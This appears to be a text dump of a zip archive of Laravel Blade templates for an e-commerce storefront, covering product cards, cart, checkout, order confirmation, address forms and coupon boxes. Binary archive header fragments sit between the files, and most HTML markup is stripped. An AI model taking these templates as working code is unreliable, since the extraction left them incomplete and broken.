    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]��ull4views/frontend/minima/partials/todays_deal.blade.phpnu�[���@if(count($todays_deal_products) > 0)
    @if (get_setting('todays_deal_banner') != null || get_setting('todays_deal_banner_small') != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif @php $todays_deal_banner_text_color = ((get_setting('todays_deal_banner_text_color') == 'light') || (get_setting('todays_deal_banner_text_color') == null)) ? 'text-white' : 'text-dark'; @endphp
    @endifPK�N]��900&views/frontend/m_custom_page.blade.phpnu�[���

    {{ $page->getTranslation('title') }}

    {!! $page->getTranslation('content') !!}
    PK�N]��Chyhy(views/frontend/order_confirmed.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('1. My Cart') }}

    {{ translate('2. Shipping info') }}

    {{ translate('3. Delivery info') }}

    {{ translate('4. Payment') }}

    {{ translate('5. Confirmation') }}

    @php $first_order = $combined_order->orders->first() @endphp

    {{ translate('Thank You for Your Order!')}}

    {{ translate('A copy or your order summary has been sent to') }} {{ json_decode($first_order->shipping_address)->email }}

    {{ translate('Order Summary')}}
    @php $shipping = json_decode($first_order->shipping_address); $billing = json_decode($first_order->billing_address); @endphp
    {{ translate('Order date')}}: {{ date('d-m-Y H:i A', $first_order->date) }}
    {{ translate('Name')}}: {{ json_decode($first_order->shipping_address)->name }}
    {{ translate('Email')}}: {{ json_decode($first_order->shipping_address)->email }}
    {{ translate('Shipping address')}}: {{ $shipping->address }}, {{ $shipping?->city ? $shipping->city . ', ' : '' }} {{ isset($shipping->state) ? $shipping->state . ', ' : '' }} {{ $shipping->country }}
    {{ translate('Billing address')}}: {{ $billing->address }}, {{ $billing?->city ? $billing->city . ', ' : '' }} {{ isset($billing->state) ? $billing->state . ', ' : '' }} {{ $billing->country }}
    {{ translate('Order status')}}: {{ translate(ucfirst(str_replace('_', ' ', $first_order->delivery_status))) }}
    {{ translate('Total order amount')}}: {{ single_price($combined_order->grand_total) }}
    {{ translate('Shipping')}}: {{ translate('Flat shipping rate')}}
    {{ translate('Payment method')}}: {{ translate(ucfirst(str_replace('_', ' ', $first_order->payment_type))) }}
    @foreach ($combined_order->orders as $order)

    {{ translate('Order Code:')}} {{ $order->code }}

    {{ translate('Tracking Code:')}} {{ $order->tracking_code }}

    {{ translate('Delivery Type:')}} @if ($order->shipping_type != null && $order->shipping_type == 'home_delivery') {{ translate('Home Delivery') }} @elseif ($order->shipping_type != null && $order->shipping_type == 'carrier') {{ translate('Carrier') }} @elseif ($order->shipping_type == 'pickup_point') @if ($order->pickup_point != null) {{ $order->pickup_point->getTranslation('name') }} ({{ translate('Pickip Point') }}) @endif @endif
    {{-- Sold BY --}}
    {{ translate('Sold By')}}: @if($order->seller_id != null) {{ $order->shop->name ?? get_setting('site_name') }} @else {{ get_setting('site_name') }} @endif
    @if(get_seller_gstin($order) != null)
    {{ translate('GSTIN')}}: {{get_seller_gstin($order)}}
    @endif
    {{ get_seller_address($order) }}
    {{ translate('Order Details')}}
    @if(addon_is_activated('gst_system')) @if(same_state_shipping($order)) @else @endif @endif @foreach ($order->orderDetails as $key => $orderDetail) @if(addon_is_activated('gst_system')) @php $gst_amount = get_gst_by_price_and_rate($orderDetail->price - $orderDetail->coupon_discount , $orderDetail->gst_rate); $shipping_gst = get_gst_by_price_and_rate($orderDetail->shipping_cost, $orderDetail->gst_rate); @endphp @if(same_state_shipping($order)) @else @endif @endif @if(addon_is_activated('gst_system')) @else @endif @if(addon_is_activated('gst_system')) @if(same_state_shipping($order)) @else @endif @endif @endforeach
    # {{ translate('Product')}} {{ translate('Qty')}}{{ translate('Gross Amount')}} {{ translate('Discount/ Coupon')}} {{ translate('Taxable Value')}}{{ translate('CGST')}} {{ translate('SGST')}}{{ translate('IGST')}}{{ translate('Price')}}
    {{ $key+1 }} @if ($orderDetail->product != null) {{ $orderDetail->product->getTranslation('name') }} @php if($orderDetail->combo_id != null) { $combo = \App\ComboProduct::findOrFail($orderDetail->combo_id); echo '('.$combo->combo_title.')'; } @endphp

    {{ $orderDetail->variation }}

    @else {{ translate('Product Unavailable') }} @endif
    {{ $orderDetail->quantity }} {{ single_price($orderDetail->price) }} {{ single_price($orderDetail->coupon_discount) }} {{ single_price($orderDetail->price - $orderDetail->coupon_discount) }} {{ single_price($gst_amount/2) }} {{ single_price($gst_amount/2) }} {{ single_price($gst_amount) }} {{ single_price($orderDetail->price - $orderDetail->coupon_discount + $gst_amount) }}{{ single_price($orderDetail->price) }}
    {{translate('Shipping')}} 1 {{ single_price($orderDetail->shipping_cost) }} {{ single_price(0) }} {{ single_price($orderDetail->shipping_cost) }} {{ single_price($shipping_gst/2) }} {{ single_price($shipping_gst/2) }} {{ single_price($shipping_gst) }} {{ single_price($orderDetail->shipping_cost + (($orderDetail->shipping_cost* $orderDetail->gst_rate)/100)) }}
    @if(addon_is_activated('gst_system')) @else @endif
    {{ translate('Subtotal')}} {{ single_price($order->orderDetails->sum('price') + $order->orderDetails->sum('shipping_cost') - $order->orderDetails->sum('coupon_discount')) }}
    {{ translate('GST Amount')}} {{ single_price($order->orderDetails->sum('gst_amount')) }}
    {{ translate('Subtotal')}} {{ single_price($order->orderDetails->sum('price')) }}
    {{ translate('Shipping')}} {{ single_price($order->orderDetails->sum('shipping_cost')) }}
    {{ translate('Tax')}} {{ single_price($order->orderDetails->sum('tax')) }}
    {{ translate('Coupon Discount')}} {{ single_price($order->coupon_discount) }}
    {{ translate('Total')}} {{ single_price($order->grand_total) }}
    @endforeach
    @endsection @section('script') @if (get_setting('facebook_pixel') == 1) @endif @if (get_setting('google_analytics') == 1) @endif @endsection PK�N]80R�((6views/frontend/partials/account_delete_modal.blade.phpnu�[��� PK�N]�+-#��<views/frontend/partials/address/address_edit_modal.blade.phpnu�[���
    @csrf
    @if (get_active_countries()->count() > 1)
    @elseif(get_active_countries()->count() == 1) @endif @if (get_setting('has_state') == 1)
    @endif
    @if (get_setting('google_map') == 1)
    • Full Address:
    • Postal Code:
    • Country:
    • Latitude:
    • Longitude:
    @endif
    PK�N]�E58584views/frontend/partials/address/address_js.blade.phpnu�[��� PK�N]hxe##7views/frontend/partials/address/address_modal.blade.phpnu�[��� PK�N]㯶`Dviews/frontend/partials/address/billing_address_edit_modal.blade.phpnu�[���
    @csrf
    @if (get_active_countries()->count() > 1)
    @elseif(get_active_countries()->count() == 1) @endif @if (get_setting('has_state') == 1)
    @endif
    @if (get_setting('google_map') == 1)
    • Full Address:
    • Postal Code:
    • Country:
    • Latitude:
    • Longitude:
    @endif
    PK�N]�� 95#5#?views/frontend/partials/address/billing_address_modal.blade.phpnu�[��� PK�N]^�  2views/frontend/partials/cart/addedToCart.blade.phpnu�[���PK�N]�7skBkB0views/frontend/partials/cart/addToCart.blade.phpnu�[��� PK�N]_k�o��Eviews/frontend/partials/cart/auctionProductAlredayAddedCart.blade.phpnu�[��� PK�N]p��au8u8+views/frontend/partials/cart/cart.blade.phpnu�[���@php $total = 0; $carts = get_user_cart(); if (count($carts) > 0) { foreach ($carts as $key => $cartItem) { $product = get_single_product($cartItem['product_id']); $total = $total + cart_product_price($cartItem, $product, false) * $cartItem['quantity']; } } @endphp @if (!in_array(get_setting('header_element'), [6, 10])) {{ single_price($total) }} ({{count($carts) > 0 ? count($carts) : 0 }} {{translate('Items')}}) @else {{translate('Cart')}} ({{count($carts) > 0 ? count($carts) : 0 }}) @endif PK�N]�1Кj�j3views/frontend/partials/cart/cart_details.blade.phpnu�[���
    @php $cart_count = count($carts); $active_carts = $cart_count > 0 ? $carts->toQuery()->active()->get() : []; @endphp @if( $cart_count > 0 )
    @if(auth()->check()) @php $welcomeCoupon = ifUserHasWelcomeCouponAndNotUsed(); @endphp @if($welcomeCoupon)
    @php $discount = $welcomeCoupon->discount_type == 'amount' ? single_price($welcomeCoupon->discount) : $welcomeCoupon->discount.'%'; @endphp
    {{ translate('Welcome Coupon') }} {{ $discount }} {{ translate('Discount on your Purchase Within') }} {{ $welcomeCoupon->validation_days }} {{ translate('days of Registration') }}
    @endif @endif
      @php $total = 0; $admin_products = array(); $seller_products = array(); $admin_product_variation = array(); $seller_product_variation = array(); foreach ($carts as $key => $cartItem){ $product = get_single_product($cartItem['product_id']); if($product->added_by == 'admin'){ array_push($admin_products, $cartItem['product_id']); $admin_product_variation[] = $cartItem['variation']; } else{ $product_ids = array(); if(isset($seller_products[$product->user_id])){ $product_ids = $seller_products[$product->user_id]; } array_push($product_ids, $cartItem['product_id']); $seller_products[$product->user_id] = $product_ids; $seller_product_variation[$product->user_id][] = $cartItem['variation']; } } @endphp @if (!empty($admin_products)) @php $all_admin_products = true; if(count($admin_products) != count($carts->toQuery()->active()->whereIn('product_id', $admin_products)->get())){ $all_admin_products = false; } @endphp
      @foreach ($admin_products as $key => $product_id) @php $product = get_single_product($product_id); $cartItem = $carts->toQuery()->where('product_id', $product_id)->where('variation', $admin_product_variation[$key])->first(); $product_stock = $product->stocks->where('variant', $cartItem->variation)->first(); $total = $total + cart_product_price($cartItem, $product, false) * $cartItem->quantity; @endphp
    • {{ $product->getTranslation('name')  }} {{ $product->getTranslation('name') }} @if ($admin_product_variation[$key] != '') {{ translate('Variation') }}: {{ $admin_product_variation[$key] }} @endif
      {{ translate('Price')}} {{ cart_product_price($cartItem, $product, true, false) }} @if (addon_is_activated('gst_system') && $product->gst_rate > 0 && $product->hsn_code != '') {{ translate('GST')}}: {{ cart_product_gst($cartItem, $product) }} @else {{ translate('Tax')}}: {{ cart_product_tax($cartItem, $product) }} @endif
      @if ($product->digital != 1 && $product->auction_product == 0)
      @elseif($product->auction_product == 1) 1 @endif
      {{ single_price(cart_product_price($cartItem, $product, false) * $cartItem->quantity) }}
    • @endforeach @endif @if (!empty($seller_products)) @foreach ($seller_products as $key => $seller_product) @php $all_seller_products = true; if(count($seller_product) != count($carts->toQuery()->active()->whereIn('product_id', $seller_product)->get())){ $all_seller_products = false; } @endphp
      @foreach ($seller_product as $key2 => $product_id) @php $product = get_single_product($product_id); $cartItem = $carts->toQuery()->where('product_id', $product_id)->where('variation', $seller_product_variation[$key][$key2])->first(); $product_stock = $product->stocks->where('variant', $cartItem->variation)->first(); $total = $total + cart_product_price($cartItem, $product, false) * $cartItem->quantity; @endphp
    • {{ $product->getTranslation('name')  }} {{ $product->getTranslation('name') }} @if ($seller_product_variation[$key][$key2] != '') {{ translate('Variation') }}: {{ $seller_product_variation[$key][$key2] }} @endif
      {{ translate('Price')}} {{ cart_product_price($cartItem, $product, true, false) }} @if (addon_is_activated('gst_system')) {{ translate('GST')}}: {{ cart_product_gst($cartItem, $product) }} @else {{ translate('Tax')}}: {{ cart_product_tax($cartItem, $product) }} @endif
      @if ($product->digital != 1 && $product->auction_product == 0)
      @elseif($product->auction_product == 1) 1 @endif
      {{ single_price(cart_product_price($cartItem, $product, false) * $cartItem->quantity) }}
    • @endforeach @endforeach @endif
    @include('frontend.partials.cart.cart_summary', ['proceed' => 1, 'carts' => $active_carts])
    @else

    {{translate('Your Cart is empty')}}

    @endif
    PK�N]S��&�&3views/frontend/partials/cart/cart_summary.blade.phpnu�[���
    @php $subtotal_for_min_order_amount = 0; $subtotal = 0; $tax = 0; $gst= 0; $product_shipping_cost = 0; $shipping = 0; $coupon_code = null; $coupon_discount = 0; $total_point = 0; @endphp @foreach ($carts as $key => $cartItem) @php $product = get_single_product($cartItem['product_id']); $subtotal_for_min_order_amount += cart_product_price($cartItem, $cartItem->product, false, false) * $cartItem['quantity']; $subtotal += cart_product_price($cartItem, $product, false, false) * $cartItem['quantity']; $tax += cart_product_tax($cartItem, $product, false) * $cartItem['quantity']; if (addon_is_activated('gst_system')) { $gst += cart_product_gst($cartItem, $product, false); } $product_shipping_cost = $cartItem['shipping_cost']; $shipping += $product_shipping_cost; if ((get_setting('coupon_system') == 1) && ($cartItem->coupon_applied == 1)) { $coupon_code = $cartItem->coupon_code; $coupon_discount = $carts->sum('discount'); } if (addon_is_activated('club_point')) { $total_point += $product->earn_point * $cartItem['quantity']; } @endphp @endforeach

    {{ translate('Order Summary') }}

    @if (get_setting('minimum_order_amount_check') == 1 && $subtotal_for_min_order_amount < get_setting('minimum_order_amount')) {{ translate('Minimum Order Amount') . ' ' . single_price(get_setting('minimum_order_amount')) }} @endif
    {{ translate('Total Products') }} {{ sprintf("%02d", count($carts)) }}
    @if (addon_is_activated('club_point'))
    {{ translate('Total Clubpoint') }} {{ sprintf("%02d", $total_point) }}
    @endif
    @if(!addon_is_activated('gst_system')) @endif @if ($proceed != 1) @endif @if (Session::has('club_point')) @endif @if ($coupon_discount > 0) @endif @if(addon_is_activated('gst_system')) @endif @php $total = $subtotal + $tax + $shipping + $gst; if (Session::has('club_point')) { $total -= Session::get('club_point'); } if ($coupon_discount > 0) { $total -= $coupon_discount; } @endphp
    {{ translate('Subtotal') }} ({{ sprintf("%02d", count($carts)) }} {{ translate('Products') }}) {{ single_price($subtotal) }}
    {{ translate('Tax') }} {{ single_price($tax) }}
    {{ translate('Total Shipping') }} {{ single_price($shipping) }}
    {{ translate('Redeem point') }} {{ single_price(Session::get('club_point')) }}
    {{ translate('Coupon Discount') }} {{ single_price($coupon_discount) }}
    {{ translate('GST') }} {{ single_price($gst) }}
    {{ translate('Total') }} {{ single_price($total) }}
    @if (Route::currentRouteName() != 'cart') @if (get_setting('coupon_system') == 1) @if ($coupon_discount > 0 && $coupon_code)
    @csrf
    {{ $coupon_code }}
    @else
    @csrf
    @if (!auth()->check()) {{ translate('You must Login as customer to apply coupon') }} @endif
    @endif @endif @endif @if ($proceed == 1) @endif
    PK�N]���� � 4views/frontend/partials/cart/delivery_info.blade.phpnu�[���@php $admin_products = array(); $seller_products = array(); $admin_product_variation = array(); $seller_product_variation = array(); foreach ($carts as $key => $cartItem){ $product = get_single_product($cartItem['product_id']); if($product->added_by == 'admin'){ array_push($admin_products, $cartItem['product_id']); $admin_product_variation[] = $cartItem['variation']; } else{ $product_ids = array(); if(isset($seller_products[$product->user_id])){ $product_ids = $seller_products[$product->user_id]; } array_push($product_ids, $cartItem['product_id']); $seller_products[$product->user_id] = $product_ids; $seller_product_variation[] = $cartItem['variation']; } } $pickup_point_list = array(); if (get_setting('pickup_point') == 1) { $pickup_point_list = get_all_pickup_points(); } @endphp @if (!empty($admin_products))
    {{ get_setting('site_name') }} {{ translate('Inhouse Products') }} ({{ sprintf("%02d", count($admin_products)) }})
    @include('frontend.partials.cart.delivery_info_details', ['products' => $admin_products, 'product_variation' => $admin_product_variation, 'owner_id' => get_admin()->id ])
    @endif @if (!empty($seller_products)) @foreach ($seller_products as $key => $seller_product)
    {{ get_shop_by_user_id($key)->name }} {{ translate('Products') }} ({{ sprintf("%02d", count($seller_product)) }})
    @include('frontend.partials.cart.delivery_info_details', ['products' => $seller_product, 'product_variation' => $seller_product_variation, 'owner_id' => $key ])
    @endforeach @endif PK�N]�+pS S <views/frontend/partials/cart/delivery_info_details.blade.phpnu�[���
    @php $physical = false; $col_val = 'col-12'; foreach ($products as $key => $cartItem){ $product = get_single_product($cartItem); if ($product->digital == 0) { $physical = true; $col_val = 'col-md-6'; } } @endphp
      @foreach ($products as $key => $cartItem) @php $product = get_single_product($cartItem); @endphp
    • {{  $product->getTranslation('name')  }} {{ $product->getTranslation('name') }} @if ($product_variation[$key] != '') {{ translate('Variation') }}: {{ $product_variation[$key] }} @endif
    • @endforeach
    @if ($physical)
    {{ translate('Choose Delivery Type') }}
    @if (get_setting('shipping_type') != 'carrier_wise_shipping')
    @else
    @endif @if ($pickup_point_list)
    @endif
    @if ($pickup_point_list)
    @endif @if (get_setting('shipping_type') == 'carrier_wise_shipping')
    @if($carrier_list->isEmpty())
    {{ translate('Shipping is not available to your selected address.') }}
    {{ translate('Please choose a different address.') }}
    @else @foreach($carrier_list as $carrier_key => $carrier)
    @endforeach @endif
    @endif
    @endif
    PK�N]s~�K4K4:views/frontend/partials/cart/guest_shipping_info.blade.phpnu�[���
    @if (get_active_countries()->count() > 1)
    @elseif(get_active_countries()->count() == 1) @endif @if(get_setting('has_state') == 1)
    @endif
    @if (get_setting('google_map') == 1)
    • Full Address:
    • Postal Code:
    • Country:
    • Latitude:
    • Longitude:
    @endif
    @if (get_setting('billing_address_required'))
    @if (get_active_countries()->count() > 1)
    @elseif(get_active_countries()->count() == 1) @endif @if(get_setting('has_state') == 1)
    @endif
    @endif
    {{ translate('If you have already used the same mail address or phone number before, please ') }} {{ translate('Login') }} {{ translate(' first to continue') }}
    PK�N]0��fc c 3views/frontend/partials/cart/payment_info.blade.phpnu�[���

    {{ translate('Any additional info?') }}

    {{ translate('Select a payment option') }}

    @foreach (get_activate_payment_methods() as $payment_method)
    @endforeach @if (get_setting('cash_payment') == 1) @php $digital = 0; $cod_on = 1; foreach ($carts as $cartItem) { $product = get_single_product($cartItem['product_id']); if ($product['digital'] == 1) { $digital = 1; } if ($product['cash_on_delivery'] == 0) { $cod_on = 0; } } @endphp @if ($digital != 1 && $cod_on == 1)
    @endif @endif @if (Auth::check()) @if (addon_is_activated('offline_payment')) @foreach (get_all_manual_payment_methods() as $method)
    @endforeach @foreach (get_all_manual_payment_methods() as $method)
    @php echo $method->description @endphp @if ($method->bank_info != null)
      @foreach (json_decode($method->bank_info) as $key => $info)
    • {{ translate('Bank Name') }} - {{ $info->bank_name }}, {{ translate('Account Name') }} - {{ $info->account_name }}, {{ translate('Account Number') }} - {{ $info->account_number }}, {{ translate('Routing Number') }} - {{ $info->routing_number }}
    • @endforeach
    @endif
    @endforeach @endif @endif
    @if (addon_is_activated('offline_payment') && count(get_all_manual_payment_methods())>0)

    {{ translate('Browse') }}
    {{ translate('Choose image') }}
    @endif @if (Auth::check() && get_setting('wallet_system') == 1)
    {{ translate('Or, Your wallet balance :') }} {{ single_price(Auth::user()->balance) }}
    @if (Auth::user()->balance < $total) @else @endif
    @endif
    PK�N]�ׇܥU�U4views/frontend/partials/cart/shipping_info.blade.phpnu�[���@if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @if (Auth::check())
    @php $address = Auth::user()->addresses()->where('id', $address_id)->first(); if($address){ $city = optional($address->city); $area_id = $address->area_id; $has_area_id = !is_null($area_id); $city_status = $city->status; $active_area_exists = $city->areas()->where('status', 1)->exists(); $area_status = $has_area_id ? optional($address->area)->status : 1; $is_disabled = $city_status === 0 || ($has_area_id && $area_status === 0) || ($active_area_exists && !$has_area_id) || ($address->state_id == null && get_setting('has_state') == 1); } @endphp @if($address)
    @if($is_disabled)
    {{ translate('We no longer deliver in this area.') }}
    @endif
    @endif
    @if($address)
    @endif
    {{ translate('Add New Address') }}
    @if (get_setting('billing_address_required'))
    @php $address = Auth::user()->addresses()->where('set_billing', 1)->first(); if($address){ $city = optional($address->city); $area_id = $address->area_id; $has_area_id = !is_null($area_id); $city_status = $city->status; $active_area_exists = $city->areas()->where('status', 1)->exists(); $area_status = $has_area_id ? optional($address->area)->status : 1; $is_disabled = $city_status === 0 || ($has_area_id && $area_status === 0) || ($active_area_exists && !$has_area_id) || ($address->state_id == null && get_setting('has_state') == 1); } @endphp @if($address)
    @if($is_disabled)
    {{ translate('Address Not Valid, Choose Another') }}
    @endif
    @else
    {{ translate('Add New Billing Address') }}
    @endif
    @endif
    @else @include('frontend.partials.cart.guest_shipping_info') @endif PK�N]���v�W�W:views/frontend/partials/cart/selectVariantCanvas.blade.phpnu�[���
    {{ $product->getTranslation('name') }}
    @csrf
    {{ $product->getTranslation('name') }}
    @if (home_price($product) != home_discounted_price($product))
    {{ translate('Pricing') }}
    {{ home_discounted_price($product) }} {{ home_price($product) }} @if ($product->unit != null) /{{ $product->getTranslation('unit') }} @endif
    @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @endif @if (addon_is_activated('club_point') && $product->earn_point > 0)
    {{ translate('Club Point') }}: {{ $product->earn_point }}
    @endif
    @else
    {{ translate('Pricing') }}
    {{ home_discounted_price($product) }} @if ($product->unit != null) /{{ $product->unit }} @endif
    @endif @php $qty = 0; foreach ($product->stocks as $key => $stock) { $qty += $stock->qty; } @endphp
    {{ translate('Variation') }}
    @php $sizeChartId = ($product->main_category && $product->main_category->sizeChart) ? $product->main_category->sizeChart->id : 0; $sizeChartName = ($product->main_category && $product->main_category->sizeChart) ? $product->main_category->sizeChart->name : null; @endphp @if($sizeChartId != 0)
    @endif
    @if ($product->digital != 1) @if ($product->choice_options != null) @foreach (json_decode($product->choice_options) as $key => $choice)
    {{ get_single_attribute_name($choice->attribute_id) }}
    @foreach ($choice->values as $key => $value) @endforeach
    @endforeach @endif @if ($product->colors && count(json_decode($product->colors)) > 0)
    {{ translate('Color') }}
    @foreach (json_decode($product->colors) as $key => $color) @endforeach
    @endif
    @else @endif
    $0.00
    @if ($product->digital ==0) @php $qty = 0; foreach ($product->stocks as $key => $stock) { $qty += $stock->qty; } @endphp

    @if ($product->stock_visibility_state == 'quantity') {{ $qty }} {{translate('Available')}} @elseif($product->stock_visibility_state == 'text' && $qty >= 1) {{translate('In Stock')}} @endif

    {{translate('Minimum order qty')}} {{ $product->min_qty }}

    @endif
    {{ translate('QTY') }}
    @if (get_setting('whatsapp_order') == 1) @php $storeName = env('APP_NAME'); $productTitle = $product->getTranslation('name'); $productUrl = URL::to('/product') . '/' . $product->slug; $template = get_setting('order_messege_template'); $message = str_replace( ['[[storeName]]', '[[productTitle]]', '[[productUrl]]'], [$storeName, $productTitle, $productUrl], $template ); $whatsappNumber = preg_replace('/[^0-9]/', '', env('WHATSAPP_NUMBER')); $whatsappUrl = "https://wa.me/{$whatsappNumber}?text=" . urlencode($message); @endphp @if (($product->added_by == 'seller' && get_setting('whatsapp_order_seller_prods') == 1) || ($product->added_by == 'admin')) @endif @endif

    {{translate('Selected Product Summery')}}

    {{ strlen($product->getTranslation('name')) > 120 ? substr($product->getTranslation('name'), 0, 120).'...': $product->getTranslation('name')}} -
    PK�N]�1���&�&.views/frontend/partials/cart_details.blade.phpnu�[���
    @if( $carts && count($carts) > 0 )
    {{ translate('Qty')}}
    {{ translate('Product')}}
    {{ translate('Price')}}
    {{ translate('Tax')}}
    {{ translate('Total')}}
    {{ translate('Remove')}}
      @php $total = 0; @endphp @foreach ($carts as $key => $cartItem) @php $product = get_single_product($cartItem['product_id']); $product_stock = $product->stocks->where('variant', $cartItem['variation'])->first(); // $total = $total + ($cartItem['price'] + $cartItem['tax']) * $cartItem['quantity']; $total = $total + cart_product_price($cartItem, $product, false) * $cartItem['quantity']; $product_name_with_choice = $product->getTranslation('name'); if ($cartItem['variation'] != null) { $product_name_with_choice = $product->getTranslation('name').' - '.$cartItem['variation']; } @endphp
    • @if ($cartItem['digital'] != 1 && $product->auction_product == 0)
      @elseif($product->auction_product == 1) 1 @endif
      {{ $product->getTranslation('name')  }} {{ $product_name_with_choice }}
      {{ translate('Price')}} {{ cart_product_price($cartItem, $product, true, false) }}
      {{ translate('Tax')}} {{ cart_product_tax($cartItem, $product) }}
      {{ translate('Total')}} {{ single_price(cart_product_price($cartItem, $product, false) * $cartItem['quantity']) }}
    • @endforeach
    {{translate('Subtotal')}} {{ single_price($total) }}
    @if(get_setting('guest_checkout_activation') == 1 || Auth::check()) {{ translate('Continue to Shipping')}} @else @endif
    @else

    {{translate('Your Cart is empty')}}

    @endif
    PK�N]����,,.views/frontend/partials/cart_summary.blade.phpnu�[���

    {{ translate('Summary') }}

    {{ count($carts) }} {{ translate('Items') }} @php $coupon_discount = 0; @endphp @if (get_setting('coupon_system') == 1) @php $coupon_code = null; @endphp @foreach ($carts as $key => $cartItem) @if ($cartItem->coupon_applied == 1) @php $coupon_code = $cartItem->coupon_code; break; @endphp @endif @endforeach @php $coupon_discount = $carts->sum('discount'); @endphp @endif @php $subtotal_for_min_order_amount = 0; @endphp @foreach ($carts as $key => $cartItem) @php $subtotal_for_min_order_amount += cart_product_price($cartItem, $cartItem->product, false, false) * $cartItem['quantity']; @endphp @endforeach @if (get_setting('minimum_order_amount_check') == 1 && $subtotal_for_min_order_amount < get_setting('minimum_order_amount')) {{ translate('Minimum Order Amount') . ' ' . single_price(get_setting('minimum_order_amount')) }} @endif
    @if (addon_is_activated('club_point'))

    {{ translate('Total Clubpoint') }}

    @php $total_point = 0; @endphp @foreach ($carts as $key => $cartItem) @php $product = get_single_product($cartItem['product_id']); $total_point += $product->earn_point * $cartItem['quantity']; @endphp @endforeach {{ $total_point }}
    @endif
    @php $subtotal = 0; $tax = 0; $shipping = 0; $product_shipping_cost = 0; @endphp @foreach ($carts as $key => $cartItem) @php $product = get_single_product($cartItem['product_id']); $subtotal += cart_product_price($cartItem, $product, false, false) * $cartItem['quantity']; $tax += cart_product_tax($cartItem, $product, false) * $cartItem['quantity']; $product_shipping_cost = $cartItem['shipping_cost']; $shipping += $product_shipping_cost; $product_name_with_choice = $product->getTranslation('name'); if ($cartItem['variant'] != null) { $product_name_with_choice = $product->getTranslation('name') . ' - ' . $cartItem['variant']; } @endphp @endforeach
    {{ translate('Product') }} {{ translate('Total') }}
    {{ $product_name_with_choice }} × {{ $cartItem['quantity'] }} {{ single_price(cart_product_price($cartItem, $cartItem->product, false, false) * $cartItem['quantity']) }}
    @if (Session::has('club_point')) @endif @if ($coupon_discount > 0) @endif @php $total = $subtotal + $tax + $shipping; if (Session::has('club_point')) { $total -= Session::get('club_point'); } if ($coupon_discount > 0) { $total -= $coupon_discount; } @endphp
    {{ translate('Subtotal') }} {{ single_price($subtotal) }}
    {{ translate('Tax') }} {{ single_price($tax) }}
    {{ translate('Total Shipping') }} {{ single_price($shipping) }}
    {{ translate('Redeem point') }} {{ single_price(Session::get('club_point')) }}
    {{ translate('Coupon Discount') }} {{ single_price($coupon_discount) }}
    {{ translate('Total') }} {{ single_price($total) }}
    @if (get_setting('coupon_system') == 1) @if ($coupon_discount > 0 && $coupon_code)
    @csrf
    {{ $coupon_code }}
    @else
    @csrf
    @endif @endif
    PK�N]����FF3views/frontend/partials/category_elements.blade.phpnu�[���
    @foreach ($categories->childrenCategories as $key => $category)
    @endforeach
    PK�N]��n�33)views/frontend/partials/compare.blade.phpnu�[��� @if(Session::has('compare')) {{ count(Session::get('compare'))}} @endif PK�N]͟dw��-views/frontend/partials/compareText.blade.phpnu�[��� {{ translate('Compare') }} @if (Session::has('compare')) ({{ count(Session::get('compare')) }}) @endif      PK�N])^����,views/frontend/partials/coupon_box.blade.phpnu�[���@php $couponUserType = $coupon->user->user_type; @endphp @if ($couponUserType == 'admin' && $coupon->type != 'welcome_base') @php $bg = "linear-gradient(to right, #e2583e 0%, #bf1931 100%);"; @endphp @elseif ($couponUserType == 'seller') @php $bg = "linear-gradient(to right, #7cc4c3 0%, #479493 100%);"; @endphp @elseif ($coupon->type == 'welcome_base') @php $bg = "linear-gradient(to right, #98b3d1 0%, #5f4a8b 100%);"; @endphp @endif @if($coupon->type == 'product_base') @php $products = json_decode($coupon->details); $coupon_products = []; foreach($products as $product) { array_push($coupon_products, $product->product_id); } @endphp @else @php $coupon_discount = json_decode($coupon->details); @endphp @endif @php if($coupon->user->user_type != 'admin') { $shop = $coupon->user->shop; $name = $shop->name; } else { $name = get_setting('website_name'); } @endphp

    {{ $name }} @if (\Request::route()->getName() == 'coupons.all') user->user_type != 'admin') href="{{ route('shop.visit', $shop->slug) }}" @else href="{{ route('inhouse.all') }}" @endif class="ml-3 text-white hov-text-secondary-base fs-13" style="text-decoration: underline;" > {{ translate('Visit Store') }} @endif

    @if($coupon->discount_type == 'amount')

    {{ single_price($coupon->discount) }} {{ translate('OFF') }}

    @else

    {{ $coupon->discount }}% {{ translate('OFF') }}

    @endif

